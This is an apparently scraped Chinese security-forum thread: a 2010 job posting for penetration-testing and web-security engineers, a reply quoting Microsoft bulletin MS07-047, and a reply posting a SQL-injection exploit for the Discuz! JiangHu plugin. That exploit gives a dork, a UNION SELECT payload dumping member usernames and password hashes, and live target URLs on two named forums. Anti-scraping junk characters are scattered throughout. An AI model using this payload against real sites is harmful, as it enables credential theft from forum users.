返回列表 发帖

[人才招聘] [招聘] [HR]红科网安 网络安全工程师

  • 招聘职位: 网络安全测试工程师
  • 公司名称: 红科网安北京科技有限公司
  • 工作地点: 北京
  • 专业要求: 计算机专业 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 4000~6000
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.honkwin.com
  • 简历邮箱: hr@honkwin.com
  • 联系电话: (010)62717538-602 郭小姐
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++红科网安北京科技有限公司相关说明++++++++++

    本帖最后由 jeffzua 于 2010-11-7 23:02 编辑 % u* H6 o" _7 L# h8 s( t7 ~

    4 U" S5 h  u0 {1 q- w) j% [岗位职责:
    ; H- Z2 s  G" C/ t1、信息安全渗透测试、风险评估与加固工作的组织实施;
    : N3 v5 q/ Q% P/ ]2 e; A2、构建WEB内容安全体系,评估线上业务安全问题,指导安全测试,跟踪解决内容安全问题;
    6 s3 k- t7 L' k7 v1 z3、构建攻击防御系统,保障平台线上服务安全;
    / ^% O6 c4 ~  _/ }& J0 h4、构建内网安全模型,保障内网稳定和信息安全; . B0 L7 \  f1 m; {" m9 r, e* {1 S  B6 u
    5、构建攻击测试模型,评测安全设备的安全性能;
      J" S; Y1 J+ v+ m6、制定安全标准和流程,规范操作行为; / {9 T* m% @& }2 J* l7 A" q
    7、提供网络安全攻防技术及相关工具的培训; 9 T% L4 N7 ]7 ^3 U; k
    岗位要求:
    , X- k+ K5 O% K: y1、掌握信息安全基础理论知识,熟悉国内外信息安全政策与标准,包括等级保护、风险评估等; & g/ O% c1 ~3 M2 A- f3 l  R
    2、熟悉网络及应用系统的常见安全漏洞与隐患,能够利用已有工具进行识别和评估;
    . l! N0 P8 f$ i; e$ Z4 M3、针对各类主流系统(包括网络设备、操作系统、数据库及应用系统)的渗透方法,熟悉黑客常用的攻击技术、手法和相应防范措施,精通WEB安全攻击和防范方法,具有大量的安全紧急事件响应经验,具有多个渗透测试项目经验;
    # e1 J* `6 v% N- P" K4、能搭建各类渗透测试的演示环境; 能够熟练运用各种手段对系统实施有效的渗透;
    ' f( {' }! M9 e8 Z4 l5、掌握主流的安全技术,如网络安全、主机安全、应用安全、密码技术等;
    6 x' x+ B: `/ U  P2 {( f9 A' I6、熟悉主流操作系统、数据库、网络与应用系统的工作原理,全面掌握常见的安全漏洞及利用技术;
    - q5 e* c2 l" b) U9 H7、熟悉常用web应用,如: IIS、Apache 、 weblogic 、tomcat 等,能比较熟练的配置使用这些平台系统并进行优化和漏洞修补;
    # m* B% p% b/ H8 b, o优先考虑的条件: 4 n8 |9 F) x4 U4 @$ d/ E( S
    1、熟悉防火墙、IDS等安全设备; 熟悉shell、perl、php、jsp、asp.net中至少一种脚本语言
    . f9 n9 X/ @! {2、具备较好的文档写作能力,能够独立完成渗透测试方案、测试报告及攻防技术培训讲义的撰写; , T1 O. j+ h2 _/ m5 j
    3、强烈的责任心和良好的团队合作精神,较好的沟通能力; - m5 {( `& F# s8 H4 C5 t
    4、有全面的安全知识体系,对安全问题十分敏感,能够制定方案并推动其实施;
    8 d! G" A) R% K4 A  l5、具有良好的团队合作精神和主动学习精神;
    4 O9 E- x7 x6 A1 _6、有cissp、cisp证书者优先。
    $ _* c7 H2 t2 M2 h1 N( t8 T5 A* v! |3 a) a$ o' ^7 |6 p
    # Y! Y  q, }- ]. v3 d( O+ l3 t: s) @
    ) ~. g- _8 a2 v. m- c
    另外还招 《web安全工程师》 要求如下:
    7 r1 n" J( ^  O  w7 _; r6 u! {6 W; |/ z2 [$ J% o4 ?
    学历:大专    工作年限: 1年以上。。- c" d$ O0 ^8 p6 b: j; ~8 J/ e0 V
    ( b: X5 U6 a1 r' z4 F( g
    1、Web漏洞检测技术的研究# X5 o5 F7 f/ d3 e4 h7 R5 O
    2、网页木马检测技术的研究
    " T1 P' b# g! w# ]3 Z$ D# R% e3、负责Web安全评估及加固工作  g* u8 L, C% |3 H
    4、使用脚本编写程序! T5 c2 _' u9 X6 A5 w0 e1 {
    5、对公司产品进行安全测试( Y5 T/ C/ ]. T
    任职要求:& Q. e% m3 Y* i- X% ^
    1、具有一年以上Web安全方面的工作经验+ R+ v6 F4 Y0 l
    2、熟悉Web相关程序的工作原理,以及Web2.0等相关技术& \" g0 K: Q" P, t% M# E! d' w
    3、对Web攻击(Sql注入、XSS、挂马等)有深入的研究和认识, 熟悉Web渗透和防御的基本技能, 熟悉常见的Web漏洞、Web木马、Web挂马技术和Web渗透技术;
    ! C* |, K0 r1 Q7 `9 ]: j3、具备较强的编程能力(C/C++,网页编程和脚本编程),优先考虑;
    1 U9 W2 k" J. [6 @, V4、对攻防策略的研究具备浓厚的兴趣;* m  S( g' U7 P7 e0 O  w$ ?% P
    5、有团队合作意识,具有较强的沟通及团队协作能力,勤奋踏实,吃苦耐力。

     

    您可能还想看的主题:

    《瑞星网络安全高级工程师培训》课程表

    我的一份作业,基于BT平台的利用。初级教程。以前那个连接失效了。从新发下。

    安全宝招聘安全服务工程师

    SpyEye 1.3.45 Loader源代码下载

    知道创宇长期招聘Web安全研究员/Python Web研发工程师

    北京某安全公司招聘WEB安全工程师

    新浪招聘安全工程师、安全开发工程师

    谷歌雅虎等宣布6月24日为全球IPv6测试日

    IP地址即将用光

    我国网络安全的若干新思考

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:jeffzua发表,本帖发表者jeffzua符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者jeffzua和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    MS07-047:Windows Media Player 中存在安全漏洞
    发布日期: 八月 14, 2007版本: 1.0

    ( `" ^" G' O# H; ~
    摘要:
    & C" n/ |) k0 ~1 {) F7 V! G
    此重要安全更新可解决两个秘密报告的漏洞。 如果用户在 Windows Media Player 中查看了特制文件,这些漏洞可能允许执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

    ; t6 ?$ b. i* M' f1 ^$ h
    这是针对受支持版本 Windows Media Player 7.1、9、10 的重要安全更新。

    6 D3 ~# q) B: H
    建议。 Microsoft 建议用户应用此更新。
    : q- z) e  H4 H0 u
    受影响的软件操作系统 组件 最大安全影响 综合严重程度等级 此更新替代的公告  Windows 2000 Service Pack 4 Windows Media Player 7.1 远程执行代码 重要 MS06-024 Windows 2000 Service Pack 4 Windows Media Player 9 远程执行代码 重要 MS06-024 Windows XP Service Pack 2 Windows Media Player 9 远程执行代码 重要 MS06-024 Windows XP Service Pack 2 Windows Media Player 10 远程执行代码 重要 MS06-024 Windows XP Professional X64 Edition Windows Media Player 10 远程执行代码 重要 MS06-024 Windows XP Professional X64 Edition Service Pack 2 Windows Media Player 10 远程执行代码 重要 无 Windows Server 2003 Service Pack 1 Windows Media Player 10 远程执行代码 重要 MS06-024 Windows Server 2003 Service Pack 2 Windows Media Player 10 远程执行代码 重要 无 Windows Server 2003 x64 Edition Windows Media Player 10 远程执行代码 重要 MS06-024 Windows Server 2003 x64 Edition Service Pack 2 Windows Media Player 10 远程执行代码 重要 无 Windows XP Service Pack 2 Windows Media Player 11 远程执行代码 重要 MS06-024 Windows XP Professional X64 Edition Windows Media Player 11 远程执行代码 重要 MS06-024 Windows XP Professional X64 Edition Service Pack 2 Windows Media Player 11 远程执行代码 重要 无 Windows Vista Windows Media Player 11 远程执行代码 重要 无 Windows Vista x64 Edition Windows Media Player 11 远程执行代码 重要 无

    9 z# r( {3 i& N9 D
    微软的安全公告:

    - ^, Y. @- g5 x5 F! ?
    http://www.microsoft.com/china/technet/security/bulletin/MS07-047.mspx
    % v9 |6 `- X$ Y8 K" }; i; a
    (以上链接均连到第三方网站)

    - @! u; q& K" M  h$ [% P
    * h3 ]7 U. m9 g  n6 k( W+ S9 ?; X3 p+ z  X6 A$ O' ^5 \! V
    : z+ m' ?2 i6 O4 y

    7 Q! y. E2 ~/ \) J3 [# `3 p1 D& t: G, C  z$ z) K
    ; K( ^: ~- O; t5 \# e7 Z$ i6 \

      i+ x0 J  b, [5 u+ t1 R
    ) f8 h$ t0 b+ y- C: Z& [; E# ^  Y. i& K/ q. Q$ i  j2 i' F. R) d. ?" Q+ X

    . p2 c* Z& C& o' l; x/ X* \" F
    " [" d' a9 H7 I& t; |4 o( x7 |6 K

    & i  S) V: i, K+ p9 `* ~0 |7 O0 y. p7 A+ a  O
    ( R# W, L  x4 l5 ^/ V2 L
    * c9 ~2 i& }6 P  X5 b* z: e
    0 e* F$ w/ o7 P$ s

    ; L' b% Q+ j3 u7 t; J公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    哈哈 支持啊 可以换头像咯哦,不过现在也蛮不错的。
    ; l( U; J1 l) U  P* {4 ]/ [) X  [

    * [! ^3 i. i7 @7 h: h
    : Z! g! u; \. d% C1 M# x: O% |! J( l, c" T# `
      h4 I+ B, b, G  ^; h- K$ u! m

    5 Z4 i7 H% z) x( S: r# h0 V* l$ m/ s) o' N
    ( p1 C' n4 n7 P: u
    9 H, {: ]; f' g8 H( `0 y

    ( c0 Z# F6 _" f1 n
    * p' i1 H, e: r% ~! d& F
    # V" N( x. L8 ?, e  j$ u3 R/ C& z  P" E- O6 h$ J
    4 Y; A+ v& V' S

    ) w& M8 U" a0 T
    3 Y3 f8 ^, ~& k+ p$ O' r: y4 H# X/ ^* s
      C2 Z% S* ~+ a' c/ ?# _  G0 h/ V
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Discuz!论坛江湖插件漏洞
    [+] Founded         : ZhaoHuAn                                     [+] Contact        : ZhengXing[at]shandagames[dot]com                           [+] Date        : Feb, 9th 2009         [+] Update        : Sep, 1th 2009                                                                          ========================[Soft Info]======================                                                                                  Software: Discuz! Plugin JiangHu Inn                         Version        : 1.1                                                         Vendor        :http://www.discuz.com d0rk    : inurl:forummission.php                                              [-] Exploit: [+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- [-] SqlI PoC: [+]http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- [+] Demo Live: [-]http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- [-]http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- 7 L( C3 P6 {# V8 ]7 ?6 s

    & C2 A6 W3 P+ v( M8 V9 B$ F2 A/ f/ \" q. Q$ E

    / s* I7 J* n# i: F; X1 R
    ; n7 G( X- a; T/ a' m3 t
    ; i: l  d7 \: q; f9 l; ~4 u9 g" s# v& T5 K( `( X" @% y
    9 T! V% X: }8 }" `

    / U# g# F$ D, i. j! h2 A$ m6 H# e+ k) C, _

      }3 A& F5 n' B: O0 j0 r$ a6 ~9 W% X2 \6 A8 [/ n7 K! c
    0 }# B6 U/ }0 {: i

    1 p1 G" q0 W/ R& z; ]  r5 l. H
    6 E7 C# O2 Y. l! D) ?
    : V4 O/ h8 _0 t
    ) m5 y* ?% |: D/ t# b' C* {; U5 d+ d9 P  I* Z8 e
    7 _; J) B9 o. Y% t7 n
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表